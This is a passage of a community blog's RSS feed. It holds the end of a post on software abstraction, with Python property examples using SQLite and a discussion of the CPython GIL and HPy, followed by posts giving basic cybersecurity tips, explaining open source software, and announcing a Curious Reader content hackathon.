<p>For example, in the code snippet above, we have a Book class with three internal attributes: <code>_name</code>, <code>_author</code>, <code>_price</code>. These attributes are only accessed (or should be accessed) by the internal methods of the class, and external programs only interact with these attributes via the property descriptors. This means that external programs cannot modify these attributes, and if they should, we can extend the property descriptors to have controlled modifications. So even when we change the internal attributes to something else, the external programs can still interact with our class as if nothing has changed. For example, I'll change the <code>_author</code> attribute to retrieve its value from an external database.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> sqlite3
con = sqlite3.connect(<span class="hljs-string">"bookstore.db"</span>)
cur = con.cursor()

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Book</span> (<span class="hljs-params">object</span>):</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span> (<span class="hljs-params">self,
        name:str,
        author:str,
        price:int,
    </span>) -&gt; <span class="hljs-keyword">None</span>:</span>
        self._name = name
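        <span class="hljs-comment"># bind the value as a one-element tuple; fetchone() returns None when the author is missing, so [0] then raises</span>
        self._author = cur.execute(<span class="hljs-string">'SELECT authors FROM Books WHERE authors = ? '</span>, (author,)).fetchone()[<span class="hljs-number">0</span>]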
        self._price = price

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">name</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._name

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">author</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._author

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">price</span> (<span class="hljs-params">self</span>):</span>
        <span class="hljs-keyword">return</span> self._price
</code></pre>
<p>The above code is not tested, and should not be used unless you place a <code>try</code> <code>except</code> block around the <code>_author</code> lookup to protect you from errors when the author is not found in the database. Anyway, with this level of detail added, our external program does not know that we've included this. They will happily interact with our API without fear.</p>
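<p>A runnable version of the same idea, added here as an illustration and not taken from the original post: two Book implementations, one keeping state in private attributes and one in a SQLite row, expose identical properties, allow only a validated price change, and are used by the same external function without it noticing the difference. <code>StoredBook</code>, <code>validated_price</code>, <code>apply_discount</code>, <code>try_set</code>, the table layout and the sample book are all assumptions made for this example.</p>

```python
import sqlite3


def validated_price(value):
    """The single gate every price change has to pass through."""
    if isinstance(value, bool) or not isinstance(value, int) or value < 0:
        raise ValueError(f"price must be a non-negative integer, got {value!r}")
    return value


class Book:
    """Version 1: state kept in private attributes."""

    def __init__(self, name, author, price):
        self._name = name
        self._author = author
        self._price = validated_price(price)

    @property
    def name(self):
        return self._name

    @property
    def author(self):
        return self._author

    @property
    def price(self):
        return self._price

    @price.setter
    def price(self, value):                 # controlled modification
        self._price = validated_price(value)


class StoredBook:
    """Version 2: same public surface, state moved into a database row."""

    def __init__(self, con, name):
        self._con = con
        # Values are bound with ? placeholders, never pasted into the SQL text.
        row = con.execute("SELECT id FROM Books WHERE name = ?", (name,)).fetchone()
        if row is None:                     # the missing-row case, handled explicitly
            raise LookupError(f"no book named {name!r}")
        self._id = row[0]

    def _row(self):
        return self._con.execute(
            "SELECT name, author, price FROM Books WHERE id = ?", (self._id,)
        ).fetchone()

    @property
    def name(self):
        return self._row()[0]

    @property
    def author(self):
        return self._row()[1]

    @property
    def price(self):
        return self._row()[2]

    @price.setter
    def price(self, value):
        self._con.execute(
            "UPDATE Books SET price = ? WHERE id = ?", (validated_price(value), self._id)
        )


def apply_discount(book, percent):
    """The external program: it only ever touches the public properties."""
    book.price = book.price * (100 - percent) // 100
    return f"{book.name} by {book.author}: {book.price}"


def try_set(book, field, value):
    """Attempt a direct modification and report how the class responded."""
    try:
        setattr(book, field, value)
        return "accepted"
    except (ValueError, AttributeError) as exc:
        return type(exc).__name__


def demo():
    con = sqlite3.connect(":memory:")       # constructed sample database
    con.execute("CREATE TABLE Books (id INTEGER PRIMARY KEY, name TEXT, author TEXT, price INTEGER)")
    con.execute("INSERT INTO Books (name, author, price) VALUES (?, ?, ?)",
                ("Example Title", "A. Author", 40000))
    books = [Book("Example Title", "A. Author", 40000), StoredBook(con, "Example Title")]
    summaries = [apply_discount(book, 25) for book in books]
    rejected = [try_set(book, field, value) for book in books
                for field, value in (("price", -1), ("author", "Someone Else"))]
    try:
        StoredBook(con, "Unknown Title")
        missing = "found"
    except LookupError:
        missing = "LookupError"
    return {"summaries": summaries, "rejected": rejected, "missing": missing}


if __name__ == "__main__":
    print(demo())
```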
<p>Bigger systems combat coupling by introducing message queues and relying on the event-driven design pattern. Message queues help your system scale and allow you to plug in new services with little to no need for configurations and changes in the entire system. This helps you deploy products much faster and lessens your time to market. It also contributes to the high availability of the system.</p>
<h4 id="heading-cpython-case-study">CPython case study</h4>
<p>The Python programming language is among the most popular, or even the most popular, programming languages in the world currently. It has many implementations, with the most popular being the reference implementation in C called CPython. Other implementations include PyPy, GraalPython, IronPython, Jython, etc. (the last two are no longer maintained).</p>
<p>We turn our focus to CPython, which was first published approximately 30 years ago by Guido van Rossum. Guido designed the language to be as simple as possible and easy to learn, which is why it's popular today. But he made some design decisions back then that are raising many concerns today. One of the famous internal features is the Global Interpreter Lock, often called the GIL. The GIL is supposed to simplify the way multiple Python threads interact with Python state such as dictionaries, lists and tuples, to avoid their corruption by many threads trying to modify them at the same time. However, this exerts a heavy toll on multithreaded programs that would like to run multiple Python threads in parallel, not concurrently. Due to this very real need, many prominent libraries such as NumPy dug down to the C-API layer of CPython and side-stepped the effects of the GIL by releasing it around areas that require heavy computation and reacquiring it when it's time to interact with Python.</p>
<p>Everything seemed calm until the push to remove the GIL became significant. There have been significant efforts to remove the GIL; however, all of them introduced breaking changes inside CPython in features that the external libraries rely on. That means introducing these changes would render thousands of packages and libraries relying on these features useless, something that the CPython community cannot let happen.</p>
<p>So there's an apparent need to evolve the internals of CPython to make it fit for the modern era of computation and data processing, but introducing those changes comes at a high cost, which has been felt before when the community decided to move from version 2 to version 3. Some libraries never even recovered from that toll of rewriting hundreds of thousands of lines of Python code. I've only highlighted the GIL, but many other areas have caused libraries to tightly couple with the Python C-API. The problem comes from the issue I stated earlier: Python exposes its internal state and internal API to external code, which causes tight coupling.</p>
<p>There are significant efforts currently underway to solve this problem. One of them is the HPy project being worked on by the PyPy team. HPy is supposed to be a better C-API for the Python language. It's designed to be easily adopted by other implementations and hides the internal state and data of Python internals behind a handle (hence the name HPy). The handle is our abstraction between the external code and the Python internals, much as the regional mail receiver is an abstraction between Tom and the Mulindwas.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>Abstractions are a very wide and very important concept in software development. I've not been able to mention a lot of concepts because this is meant to be a short blog post and not a book. I'll hopefully share more information on how to implement abstraction or indirections more efficiently in a future post (only if there's interest in it), but alas, this is the end of this blog post. Catch you in the next post.</p>
]]></content:encoded></item><item><title><![CDATA[Cyber Awareness]]></title><description><![CDATA[Top Cybersecurity Tips in 2022
Here, we’ve compiled a list of the top cybersecurity tips and best practices for you to implement and share with others. We’ll continue to update this list to help keep your business secure.
1. Keep software up-to-date
...]]></description><link>https://blog.oscakampala.org/cyber-awareness</link><guid isPermaLink="true">https://blog.oscakampala.org/cyber-awareness</guid><category><![CDATA[#cybersecurity]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Thu, 22 Dec 2022 11:08:36 GMT</pubDate><content:encoded><![CDATA[<h2 id="heading-top-cybersecurity-tips-in-2022">Top Cybersecurity Tips in 2022</h2>
<p>Here, we’ve compiled a list of the top cybersecurity tips and best practices for you to implement and share with others. We’ll continue to update this list to help keep your business secure.</p>
<h3 id="heading-1-keep-software-up-to-date">1. Keep software up-to-date</h3>
<p>Software companies typically provide software updates for 3 reasons: to add new features, fix known bugs, and upgrade security.</p>
<p>Always update to the latest version of your software to protect yourself from new or existing security vulnerabilities.</p>
<h3 id="heading-2-avoid-opening-suspicious-emails">2. Avoid opening suspicious emails</h3>
<p>If an email looks suspicious, don’t open it because it might be a <a target="_blank" href="http://www.phishing.org/what-is-phishing">phishing scam</a>.</p>
<p>Someone might be impersonating another individual or company to gain access to your personal information. Sometimes the emails may also include attachments or links that can infect your devices.</p>
<h3 id="heading-3-keep-hardware-up-to-date">3. Keep hardware up-to-date</h3>
<p>Outdated computer hardware may not support the most recent software security upgrades. Additionally, old hardware makes it slower to respond to cyber-attacks if they happen. Make sure to use computer hardware that’s more up-to-date.</p>
<h3 id="heading-4-use-a-secure-file-sharing-solution-to-encrypt-data">4. Use a secure file-sharing solution to encrypt data</h3>
<p>If you regularly share confidential information, you absolutely need to start using a secure file-sharing solution. Regular email is not meant for exchanging sensitive documents, because if the emails are intercepted, unauthorized users will have access to your precious data.</p>
<p>On the other hand, using a secure file-sharing solution like TitanFile will automatically encrypt sensitive files so that you don’t have to worry about a data breach. Remember, your files are only as secure as the tools you choose to share them with.</p>
<h3 id="heading-5-use-anti-virus-and-anti-malware">5. Use anti-virus and anti-malware</h3>
<p>As long as you’re connected to the web, it’s impossible to have complete and total protection from malware. However, you can significantly reduce your vulnerability by ensuring you have an anti-virus and at least one anti-malware installed on your computers.</p>
<h3 id="heading-6-use-a-vpn-to-privatize-your-connections">6. Use a VPN to privatize your connections</h3>
<p>For a more secure and privatized network, use a virtual private network (VPN). It’ll encrypt your connection and protect your private information, even from your internet service provider.</p>
<h3 id="heading-7-check-links-before-you-click">7. Check links before you click</h3>
<p>Links can easily be disguised as something they’re not so it’s best to double check before you click on a hyperlink. On most browsers, you can see the target URL by hovering over the link. Do this to check links before you click on them.</p>
<h3 id="heading-8-dont-be-lazy-with-your-passwords">8. Don’t be lazy with your passwords!</h3>
<p>Put more effort into creating your passwords. You can use a tool like <a target="_blank" href="http://howsecureismypassword.net">howsecureismypassword.net</a> to find out how secure your passwords are.</p>
<h3 id="heading-9-disable-bluetooth-when-you-dont-need-it">9. Disable Bluetooth when you don’t need it</h3>
<p>Devices can be <a target="_blank" href="https://www.forbes.com/sites/thomasbrewster/2018/07/24/bluetooth-hack-warning-for-iphone-android-and-windows/#338c00a17d73">hacked via Bluetooth</a> and subsequently your private information can be stolen. If there’s no reason to have your Bluetooth on, turn it off!</p>
<h3 id="heading-10-enable-2-factor-authentication">10. Enable 2-Factor Authentication</h3>
<p>Many platforms now allow you to enable 2-factor authentication to keep your accounts more secure. It’s another layer of protection that helps verify that it’s actually you who is accessing your account and not someone who’s unauthorized. Enable this security feature when you can.</p>
<h3 id="heading-11-remove-adware-from-your-machines">11. Remove adware from your machines</h3>
<p>Adware collects information about you to serve you more targeted ads. It’s best to rid your computer of all forms of adware to maintain your privacy. Use <a target="_blank" href="https://www.malwarebytes.com/adwcleaner/">AdwCleaner</a> to clean adware and unwanted programs from your computer.</p>
<h3 id="heading-12-double-check-for-https-on-websites">12. Double check for HTTPS on websites</h3>
<p>When you’re on a website that isn’t using HTTPS, there’s no guarantee that the transfer of information between you and the site’s server is secure. Double-check that a site’s using HTTPS before you give away personal or private information.</p>
<h3 id="heading-13-dont-store-important-information-in-non-secure-places">13. Don’t store important information in non-secure places</h3>
<p>When storing information online, you want to keep it in a location that can’t be accessed by unauthorized users.</p>
<h3 id="heading-14-scan-external-storage-devices-for-viruses">14. Scan external storage devices for viruses</h3>
<p>External storage devices are just as prone to malware as internal storage devices. If you connect an infected external device to your computer, the malware can spread. Always scan external devices for malware before accessing them.</p>
<h3 id="heading-15-avoid-using-public-networks">15. Avoid using public networks</h3>
<p>When you connect to a public network, you’re sharing the network with everyone who is also connected. Any information you send or retrieve on the network is vulnerable. Stay away from public networks or use a VPN when you’re connected to one.</p>
<h3 id="heading-16-avoid-the-secure-enough-mentality">16. Avoid the “secure enough” mentality</h3>
<p>Unless you’re completely isolated from the rest of the world, there’s no such thing as being “secure enough.” Big companies like Facebook invest a fortune into security every year but are still affected by cyber attacks.</p>
<h3 id="heading-17-invest-in-security-upgrades">17. Invest in security upgrades</h3>
<p>Following the previous tip, try to invest in security upgrades when they’re available. It’s better to eat the costs of security than pay for the consequences of a security breach!</p>
<h3 id="heading-18-back-up-important-data">18. Back up important data</h3>
<p>Important data can be lost as a result of a security breach. To make sure you’re prepared to restore data once it’s lost, you should ensure your important information is backed up frequently on the cloud or a local storage device.</p>
<h3 id="heading-19-train-employees">19. Train employees</h3>
<p>The key to making cybersecurity work is to make sure your employees are well trained, in sync, and consistently exercising security practices. Sometimes, one mistake from an improperly trained employee can cause an entire security system to crumble.</p>
]]></content:encoded></item><item><title><![CDATA[What is open source?]]></title><description><![CDATA[You might have come across the term "open source" once or twice, probably not at all. It might sound like a tech buzzword, but in a real sense, it isn't a difficult concept at all. In this article, I'll break it down in the simplest way to help you u...]]></description><link>https://blog.oscakampala.org/what-is-open-source</link><guid isPermaLink="true">https://blog.oscakampala.org/what-is-open-source</guid><category><![CDATA[Open Source Community]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Sasha Nannyange]]></dc:creator><pubDate>Wed, 28 Sep 2022 15:02:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1663838314620/3Y7gWlDrf.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You might have come across the term "open source" once or twice, probably not at all. It might sound like a tech buzzword, but in a real sense, it isn't a difficult concept at all. In this article, I'll break it down in the simplest way to help you understand what open source means.</p>
<p>In tech terms, open source refers to software where the source code is available to the public. This code can then be seen, modified, and redistributed according to one's preference. However, today, the word open source has become a general term that doesn't only cover the tech aspect.</p>
<p>It covers a broader set of values known as "the open source way." Open-source efforts, projects, and products embrace and celebrate the values of open exchange, team effort, quick prototyping, open communication, and community-centered development.</p>
<h2 id="heading-the-difference-between-open-source-software-and-closed-source-software">The difference between open source software and closed source software</h2>
<p><strong>Open source software</strong> is the term used to describe computer programs whose sources are available for usage and accessible by the general public. This type of software employs code that is freely accessible online for the public to use and alter in any way they see fit. </p>
<p>To use this kind of software, a user usually has to accept the terms of a license which regulates the manner in which that software can be used, researched, modified, and distributed. Some open source licenses, commonly known as "copyleft" licenses, demand that anybody who distributes a modified open source program also distribute the program's source code.</p>
<p>Some examples of open-source software include Android, Firefox, Thunderbird, OpenOffice, Gimp, etc.</p>
<p><strong>Closed source software</strong>, on the other hand, refers to computer programs whose source code is not accessible to the general public. It is called CSS in short, and here, the source code is protected. </p>
<p>The software can only be modified by the single person or entity who generated it. Closed source software is often more expensive than open source, and a valid license that has been verified is required to use it. Because of the requirement to have an authenticated license, this tends to put restrictions on the user's ability to modify the software.</p>
<p>The most common examples of closed-source software include macOS, Microsoft Office, Adobe Reader, Skype, Google Earth, etc.</p>
<p>Despite how tech-like all this sounds, open source is not only applicable to programmers or people in the tech field. As I mentioned earlier, the term open source has become a more general way of describing collaborative efforts to contribute to projects or products.</p>
<p>This means anyone with any set of skills like writing, graphic designing, etc., or ready to learn new ones can join a community of like-minded people like <a href="https://oscakampala.org/">OSCA (Kampala)</a> to contribute to local and global projects in ways that they see fit. </p>
<p>In conclusion, you can look at open source as a willingness to work with others in open-ended ways so that others can see and participate, accepting failure as a chance to grow, and encouraging everyone else to do the same.</p>
]]></content:encoded></item><item><title><![CDATA[Create content and build Curious Reader Interactive books to compete for 2,000$ in cash prizes!]]></title><description><![CDATA[Who's ready for the easiest non-coding hackathon on the planet? 🎉
We are excited to announce that Curious Learning is partnering with the amazing folks at Open Source for Equality for this July hackathon where you will be contributing open content, ...]]></description><link>https://blog.oscakampala.org/create-content-and-build-curious-reader-interactive-books-to-compete-for-2000dollar-in-cash-prizes</link><guid isPermaLink="true">https://blog.oscakampala.org/create-content-and-build-curious-reader-interactive-books-to-compete-for-2000dollar-in-cash-prizes</guid><category><![CDATA[hackathon]]></category><category><![CDATA[challenge]]></category><category><![CDATA[web app]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Deborah Aanyu Oduman]]></dc:creator><pubDate>Sat, 09 Jul 2022 21:19:50 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1657388563451/VqFy_Rfm0.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong><em>Who's ready for the easiest non-coding hackathon on the planet?</em></strong> 🎉</p>
<p>We are excited to announce that <a target="_blank" href="https://www.curiouslearning.org/">Curious Learning</a> is partnering with the amazing folks at <a target="_blank" href="https://www.oseq.org/#:~:text=With%20open%20digital%20solutions%2C%20developed,projects%20that%20promote%20gender%20equality.">Open Source for Equality</a> for this July hackathon where you will be contributing open content, Yay!!!</p>
<h1 id="heading-about-curious-reader">About Curious Reader</h1>
<p>Curious Reader is a digital storytelling platform designed to encourage interactive learning. The platform includes interactions—primarily between animation, text, and audio—that help anyone to learn to read.</p>
<p>The Curious Reader platform makes it easy to update an existing storybook to offer a richer interactive experience or to localize an existing book to other languages. There are several key features that distinguish a Curious Reader book from other learning tools:</p>
<ol>
<li><strong><em>Self-narration:</em></strong> The displayed text is narrated.</li>
<li><strong><em>Interactivity:</em></strong> Taps to words and graphics produce audio and/or visual responses.</li>
<li><strong><em>Tap to read:</em></strong> The ability to tap on individual words and hear the enunciation.</li>
<li><strong><em>Linked text and graphics:</em></strong> This establishes a relationship between text and graphics.</li>
<li><strong><em>Levelled reading:</em></strong> This allows a single story to accommodate multiple reading levels as a reader becomes more proficient at reading over time.</li>
</ol>
<p><iframe src="https://curiousreader.org/wp-admin/admin-ajax.php?action=h5p_embed&amp;id=62" width="1034" height="580"></iframe></p>
<blockquote>
<p>The Curious Reader platform is used to create web-based apps for Android and iOS smartphones, tablets, and web browsers (Chrome or Firefox).<br />Best of all, no coding experience is required!!.</p>
</blockquote>
<h1 id="heading-about-the-contributhon">About the Contributhon 💡</h1>
<p>From 14th July to 12th August, we want to see you build interactive books using the Curious Reader Authoring tool.
For this contributhon, you will choose any of three tasks:</p>
<ol>
<li>Translation - translate (an) English script(s) to a local language(s). Find out how to tackle this task <a target="_blank" href="https://portals.docsie.io/curious-learning-glp/curious-learning-glp-docs/curious-learning-glp-docs-docs/deployment_sBUpMczhAf8UVjuVr/?doc=/localization-guide/">here</a>. </li>
<li>Recording Audio. Find out how to record the best quality audio <a target="_blank" href="https://portals.docsie.io/curious-learning-glp/curious-learning-glp-docs/curious-learning-glp-docs-docs/deployment_sBUpMczhAf8UVjuVr/?doc=/content-creation-guide/voiceover-actor-instructions/">here</a>. </li>
<li>Compiling the book(s) into finished form. Find out how to do this <a target="_blank" href="https://portals.docsie.io/curious-learning-glp/curious-learning-glp-docs/curious-learning-glp-docs-docs/deployment_sBUpMczhAf8UVjuVr/?doc=/app-building-guide/">here</a>. </li>
</ol>
<p>You will also choose from this list of books, which book you want to localize or make interactive. </p>
<ul>
<li><a target="_blank" href="https://curiousreader.org/book/cicadas-song-level-2-en/?bl=emergent-reader">Cicada’s Song</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/i-am-not-afraid-level-2-en/?bl=emergent-reader">I am not afraid</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/colours-of-nature-level-2-en/?bl=emergent-reader">Colors of Nature</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/hide-and-seek-level-2-en/?bl=emergent-reader">Hide and Seek</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/lets-fly-level-2-en/?bl=emergent-reader">Let’s fly!</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/the-bee-and-the-elephant-level-2-en/?bl=emergent-reader">The bee and the elephant</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/friends-level-2-en/?bl=emergent-reader">Friends</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/the-lost-doll-level-2-en/?bl=emergent-reader">The Lost Doll</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/colours-level-2-en/?bl=emergent-reader">Colors</a></li>
<li><a target="_blank" href="https://curiousreader.org/book/tall-and-short-level-2-en/?bl=emergent-reader">Tall and Short</a></li>
</ul>
<p>This is an excellent opportunity to unlock your translation and book-building skills with a great open-source project that speaks to one of the <a target="_blank" href="https://sdgs.un.org/goals/goal4">Sustainable Development Goals (#4)</a>. </p>
<p>If this is your first time using the Curious Reader authoring tool, you'll soon see it's super easy to get started, and there is well-written <a target="_blank" href="https://portals.docsie.io/curious-learning-glp/curious-learning-glp-docs/curious-learning-glp-docs-docs/deployment_sBUpMczhAf8UVjuVr/?doc=/">documentation</a>. </p>
<h1 id="heading-how-to-participate">How to participate.</h1>
<ol>
<li>Sign up for the Curious Learning track on the <a target="_blank" href="https://www.oseq.org/challenge">OSEQ website.</a> Make sure to check the box "I am applying for the Curious Learning track". Registration ends on 14th July, 2022.</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1657400215883/J_VO9M-Og.png" alt="Screenshot 2022-07-09 at 23.21.00.png" /></p>
<ol start="2">
<li><p>After this registration, you will be sent the Curious Learning sign-up form that will help the facilitators understand which <a target="_blank" href="https://curiousreader.org/">book</a> and task you would like to work on and whether you prefer to work alone or in a group. Fill out the registration Google form as soon as possible and then submit it. </p>
</li>
<li><p>You will be sent an onboarding email that will contain all the resources that you need to successfully create a <a target="_blank" href="https://curiousreader.org/">Curious Learning book</a> and submit it for consideration for the cash prize at the end of the hackathon. </p>
</li>
<li><p>If you face any issues with the Authoring tool or need to make any inquiries, feel free to start a discussion on the Curious Learning GitHub page under the channel <a target="_blank" href="https://github.com/curiouslearning/CuriousReaderInteractiveFunctionsH5P/discussions/categories/-oseq-hackathon">#OSEQ hackathon</a>. </p>
</li>
<li><p>After submitting your content/book, make sure to fill out the feedback form that will be sent in your email. This will help the Curious Learning team gain valuable insights on how to improve the tool in order to provide you with a better book-building experience. </p>
</li>
</ol>
<blockquote>
<p>Only participants who fill out the feedback form at the end of the contributhon will be considered for the cash prize!!</p>
</blockquote>
<h1 id="heading-hackathon-prizes">Hackathon prizes 🏆</h1>
<p><em>Are you ready?!</em></p>
<p><strong>Complete Interactive books.</strong></p>
<ul>
<li>The top 2-3 groups that submit (a) complete interactive book(s) will be awarded Ugx 1,500,000 each.</li>
<li>Top 1-2 individuals who submit (a) complete interactive book(s) will be awarded Ugx 400,000 each. </li>
</ul>
<p><strong>Complete sub-tasks</strong></p>
<ul>
<li>Top 2 individuals who submit (a) translated story manuscript(s) will be awarded Ugx 100,000 each</li>
<li>Top 2 individuals who submit (a) recorded audio(s) in local language(s) will also be awarded Ugx 100,000 each. </li>
<li>Best submission for compiling (an) existing script(s) and audio(s) into an interactive book will be awarded Ugx 200,000. </li>
</ul>
<h1 id="heading-evaluation-criteria">Evaluation criteria 🔎</h1>
<p>Submissions will be judged based on the following criteria: </p>
<ul>
<li>Translations of manuscripts will be judged based on the accuracy of translation from English to the local language. </li>
<li>Recorded audio in local languages will be judged based on accuracy and relatability of intonation of voice, the pace at which sentences are being recorded (remember these are children's books), clarity of audio recordings (no white noise, background sounds, etc), completeness of audio recordings (all individual sentences and words from the manuscript have to be recorded).</li>
<li>Interactive books will be judged based on overall quality, e.g. how elements have been placed on each page, accuracy of synchronisation of words, animation and audio, etc. </li>
<li>Please note that <em>only</em> individuals who fill out the feedback form at the end of the project will be considered for the cash prize!</li>
</ul>
<h1 id="heading-winners-selection">Winners Selection. 💬</h1>
<p>Winners will be selected by the Curious Learning team. </p>
<h1 id="heading-important-dates-and-rules">Important dates and rules. 📆</h1>
<ul>
<li>9th July - Online registration of participants opens</li>
<li>14th July - Deadline for registrations and Online launch of the contributhon. Join us for the online launch on <a target="_blank" href="https://us06web.zoom.us/j/83824316706">Zoom</a>. </li>
<li>26th July - Online mentorship of participants</li>
<li>12th August - Closure of contributions</li>
<li>19th August - Networking event and announcement of winners. </li>
</ul>
<h1 id="heading-excited-help-spread-the-word">Excited? 😍 Help spread the word ...</h1>
<p>Feel free to tag Curious Learning at <a target="_blank" href="https://twitter.com/curiouslearnglp?s=21&amp;t=Vjug2auTHRblbXCGsqCeLg">@CuriousLearnGLP</a> and OSCA Kampala at <a target="_blank" href="https://twitter.com/oscakampala">@oscakampala</a> in your tweets and posts about this hackathon. 😊</p>
<h1 id="heading-need-help">Need Help? 🙋🏽‍♀️</h1>
<p>Join the hackathon channel on the <a target="_blank" href="https://github.com/curiouslearning/CuriousReaderInteractiveFunctionsH5P/discussions/categories/-oseq-hackathon">Curious Learning GitHub discussions page</a> to connect with other Curious Reader community members and hackathon participants. 
Talk to us on Twitter at <a target="_blank" href="https://twitter.com/oscakampala">@oscakampala</a>, <a target="_blank" href="https://twitter.com/curiouslearnglp?s=21&amp;t=Vjug2auTHRblbXCGsqCeLg">@CuriousLearnGLP</a> and <a target="_blank" href="https://twitter.com/OSEQorg">@OSEQorg</a>.</p>
<p>Good luck. ✌</p>
]]></content:encoded></item></channel></rss>